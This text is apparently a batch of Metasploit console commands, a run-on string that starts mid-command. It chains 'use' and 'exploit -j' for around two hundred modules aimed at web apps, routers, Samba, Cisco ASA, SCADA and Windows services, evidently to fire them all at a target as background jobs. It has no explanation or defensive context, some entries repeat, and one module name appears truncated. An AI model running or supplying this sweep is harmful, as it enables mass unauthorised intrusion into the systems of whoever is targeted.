exploit/multi/http/phpwiki_ploticus_exec;exploit -j; -use exploit/multi/http/plone_popen2;exploit -j; -use exploit/multi/http/pmwiki_pagelist;exploit -j; -use exploit/multi/http/joomla_http_header_rce;exploit -j; -use exploit/multi/http/novell_servicedesk_rce;exploit -j; -use exploit/multi/http/oracle_reports_rce;exploit -j; -use exploit/multi/http/php_utility_belt_rce;exploit -j; -use exploit/multi/http/phpfilemanager_rce;exploit -j; -use exploit/multi/http/processmaker_exec;exploit -j; -use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j; -use exploit/multi/http/spree_search_exec;exploit -j; -use exploit/multi/http/spree_searchlogic_exec;exploit -j; -use exploit/multi/http/struts_code_exec_parameters;exploit -j; -use exploit/multi/http/vtiger_install_rce;exploit -j; -use exploit/multi/http/werkzeug_debug_rce;exploit -j; -use exploit/multi/http/zemra_panel_rce;exploit -j; -use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; -use exploit/multi/http/joomla_http_header_rce;exploit -j; -use exploit/unix/webapp/joomla_akeeba_unserialize;exploit -j; -use exploit/unix/webapp/joomla_comjce_imgmanager;exploit -j; -use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; -use exploit/unix/webapp/joomla_media_upload_exec;exploit -j; -use exploit/multi/http/builderengine_upload_exec;exploit -j; -use exploit/multi/http/caidao_php_backdoor_exec;exploit -j; -use exploit/multi/http/atutor_sqli;exploit -j; -use exploit/multi/http/ajaxplorer_checkinstall_exec;exploit -j; -use exploit/multi/http/apache_activemq_upload_jsp;exploit -j; -use exploit/unix/webapp/wp_lastpost_exec;exploit -j; -use exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit -j; -use exploit/multi/http/axis2_deployer;exploit -j; -use exploit/unix/webapp/wp_foxypress_upload;exploit -j; -use exploit/linux/http/tr064_ntpserver_cmdinject;exploit -j; -use exploit/linux/misc/quest_pmmasterd_bof;exploit -j; -use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit -j; -use exploit/unix/webapp/php_xmlrpc_eval;exploit -j; -use exploit/unix/webapp/wp_admin_shell_upload;exploit -j; -use exploit/linux/http/sophos_wpa_sblistpack_exec;exploit -j; -use exploit/linux/local/sophos_wpa_clear_keys;exploit -j; -use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; -use auxiliary/admin/cisco/cisco_asa_extrabacon;exploit -j; -use auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit -j; -use auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit -j; -use exploit/bsdi/softcart/mercantec_softcart;exploit -j; -use exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit -j; -use exploit/freebsd/samba/trans2open;exploit -j; -use exploit/linux/ftp/proftp_sreplace;exploit -j; -use exploit/linux/http/dcos_marathon;exploit -j; -use exploit/linux/http/f5_icall_cmd;exploit -j; -use exploit/linux/http/fritzbox_echo_exec;exploit -j; -use exploit/linux/http/gitlist_exec;exploit -j; -use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j; -use exploit/linux/http/ipfire_bashbug_exec;exploit -j; -use exploit/linux/http/ipfire_oinkcode_exec;exploit -j; -use exploit/linux/http/ipfire_proxy_exec;exploit -j; -use exploit/linux/http/kaltura_unserialize_rce;exploit -j; -use exploit/linux/http/lifesize_uvc_ping_rce;exploit -j; -use exploit/linux/http/nagios_xi_chained_rce;exploit -j; -use exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit -j; -use exploit/linux/http/netgear_wnr2000_rce ;exploit -j; -use exploit/linux/http/nuuo_nvrmini_auth_rce;exploit -j; -use exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit -j; -use exploit/linux/http/op5_config_exec;exploit -j; -use exploit/linux/http/pandora_fms_exec;exploit -j; -use exploit/linux/http/pineapple_preconfig_cmdinject;exploit -j; -use exploit/linux/http/seagate_nas_php_exec_noauth;exploit -j; -use exploit/linux/http/symantec_messaging_gateway_exec;exploit -j; -use exploit/linux/http/trendmicro_imsva_widget_exec;exploit -j; -use exploit/linux/http/trueonline_billion_5200w_rce;exploit -j; -use exploit/linux/http/trueonline_p660hn_v1_rce;exploit -j; -use exploit/linux/http/trueonline_p660hn_v2_rce;exploit -j; -use exploit/linux/http/vcms_upload;exploit -j; -use exploit/linux/misc/lprng_format_string;exploit -j; -use exploit/linux/misc/mongod_native_helper;exploit -j; -use exploit/linux/misc/ueb9_bpserverd;exploit -j; -use exploit/linux/mysql/mysql_yassl_getname;exploit -j; -use exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit -j; -use exploit/linux/postgres/postgres_payload;exploit -j; -use exploit/linux/pptp/poptop_negative_read;exploit -j; -use exploit/linux/proxy/squid_ntlm_authenticate;exploit -j; -use exploit/linux/samba/lsa_transnames_heap;exploit -j; -use exploit/linux/samba/setinfopolicy_heap;exploit -j; -use exploit/linux/samba/trans2open;exploit -j; -use exploit/multi/elasticsearch/script_mvel_rce;exploit -j; -use exploit/multi/elasticsearch/search_groovy_script;exploit -j; -use exploit/multi/http/atutor_sqli;exploit -j; -use exploit/multi/http/axis2_deployer;exploit -j; -use exploit/multi/http/familycms_less_exe;exploit -j; -use exploit/multi/http/freenas_exec_raw;exploit -j; -use exploit/multi/http/gestioip_exec;exploit -j; -use exploit/multi/http/glassfish_deployer;exploit -j; -use exploit/multi/http/glpi_install_rce;exploit -j; -use exploit/multi/http/joomla_http_header_rce;exploit -j; -use exploit/multi/http/makoserver_cmd_exec;exploit -j; -use exploit/multi/http/novell_servicedesk_rc;exploit -j; -use exploit/multi/http/oracle_reports_rce;exploit -j; -use exploit/multi/http/php_utility_belt_rce;exploit -j; -use exploit/multi/http/phpfilemanager_rce;exploit -j; -use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j; -use exploit/multi/http/phpwiki_ploticus_exec;exploit -j; -use exploit/multi/http/processmaker_exec;exploit -j; -use exploit/multi/http/rails_actionpack_inline_exec;exploit -j; -use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j; -use exploit/multi/http/rails_secret_deserialization;exploit -j; -use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j; -use exploit/multi/http/simple_backdoors_exec;exploit -j; -use exploit/multi/http/spree_search_exec;exploit -j; -use exploit/multi/http/spree_searchlogic_exec;exploit -j; -use exploit/multi/http/struts2_rest_xstream;exploit -j; -use exploit/multi/http/struts_code_exec;exploit -j; -use exploit/multi/http/struts_code_exec_classloader;exploit -j; -use exploit/multi/http/struts_code_exec_parameters;exploit -j; -use exploit/multi/http/struts_dev_mode;exploit -j; -use exploit/multi/http/sysaid_auth_file_upload;exploit -j; -use exploit/multi/http/tomcat_jsp_upload_bypass;exploit -j; -use exploit/multi/http/vtiger_install_rce;exploit -j; -use exploit/multi/http/werkzeug_debug_rce;exploit -j; -use exploit/multi/http/zemra_panel_rce;exploit -j; -use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; -use exploit/multi/ids/snort_dce_rpc;exploit -j; -use exploit/multi/misc/batik_svg_java;exploit -j; -use exploit/multi/misc/pbot_exec;exploit -j; -use exploit/multi/misc/veritas_netbackup_cmdexec;exploit -j; -use exploit/multi/mysql/mysql_udf_payload;exploit -j; -use exploit/multi/php/php_unserialize_zval_cookie;exploit -j; -use exploit/unix/http/freepbx_callmenum;exploit -j; -use exploit/unix/http/lifesize_room;exploit -j; -use exploit/unix/http/pfsense_clickjacking;exploit -j; -use exploit/unix/http/pfsense_group_member_exec;exploit -j; -use exploit/unix/http/tnftp_savefile;exploit -j; -use exploit/unix/misc/polycom_hdx_traceroute_exec;exploit -j; -use exploit/unix/webapp/awstats_migrate_exec;exploit -j; -use exploit/unix/webapp/carberp_backdoor_exec;exploit -j; -use exploit/unix/webapp/citrix_access_gateway_exec;exploit -j; -use exploit/unix/webapp/dogfood_spell_exec;exploit -j; -use exploit/unix/webapp/invision_pboard_unserialize_exec;exploit -j; -use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; -use exploit/unix/webapp/mybb_backdoor;exploit -j; -use exploit/unix/webapp/opensis_modname_exec;exploit -j; -use exploit/unix/webapp/oscommerce_filemanager;exploit -j; -use exploit/unix/webapp/piwik_superuser_plugin_upload;exploit -j; -use exploit/unix/webapp/tikiwiki_upload_exec;exploit -j; -use exploit/unix/webapp/webtester_exec;exploit -j; -use exploit/unix/webapp/wp_phpmailer_host_header;exploit -j; -use exploit/unix/webapp/wp_total_cache_exec;exploit -j; -use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j; -use exploit/windows/http/ektron_xslt_exec;exploit -j; -use exploit/windows/http/ektron_xslt_exec_ws;exploit -j; -use exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit -j; -use exploit/windows/http/hp_autopass_license_traversal;exploit -j; -use exploit/windows/http/manage_engine_opmanager_rce;exploit -j; -use exploit/windows/http/netgear_nms_rce;exploit -j; -use exploit/windows/http/sepm_auth_bypass_rce;exploit -j; -use exploit/windows/http/trendmicro_officescan_widget_exec;exploit -j; -use exploit/windows/iis/iis_webdav_upload_asp;exploit -j; -use exploit/windows/iis/msadc;exploit -j; -use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j; -use exploit/windows/novell/file_reporter_fsfui_upload;exploit -j; -use exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit -j; -use exploit/windows/smb/ipass_pipe_exec;exploit -j; -use exploit/windows/smb/smb_relay;exploit -j; -use auxiliary/sqli/oracle/jvm_os_code_10g;exploit -j; -use auxiliary/sqli/oracle/jvm_os_code_11g;exploit -j; -use auxiliary/fuzzers/dns/dns_fuzzer;exploit -j; -use auxiliary/fuzzers/ftp/client_ftp;exploit -j; -use auxiliary/fuzzers/ftp/ftp_pre_post;exploit -j; -use auxiliary/fuzzers/http/http_form_field;exploit -j; -use auxiliary/fuzzers/http/http_get_uri_long;exploit -j; -use auxiliary/fuzzers/http/http_get_uri_strings;exploit -j; -use auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit -j; -use auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit -j; -use auxiliary/fuzzers/smb/smb_create_pipe;exploit -j; -use auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit -j; -use auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit -j; -use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit -j; -use auxiliary/fuzzers/smb/smb_tree_connect;exploit -j; -use auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit -j; -use auxiliary/fuzzers/smtp/smtp_fuzzer;exploit -j; -use auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit -j; -use auxiliary/fuzzers/ssh/ssh_version_15;exploit -j; -use auxiliary/fuzzers/ssh/ssh_version_2;exploit -j; -use auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit -j; -use auxiliary/fuzzers/tds/tds_login_corrupt;exploit -j; -use auxiliary/fuzzers/tds/tds_login_username;exploit -j;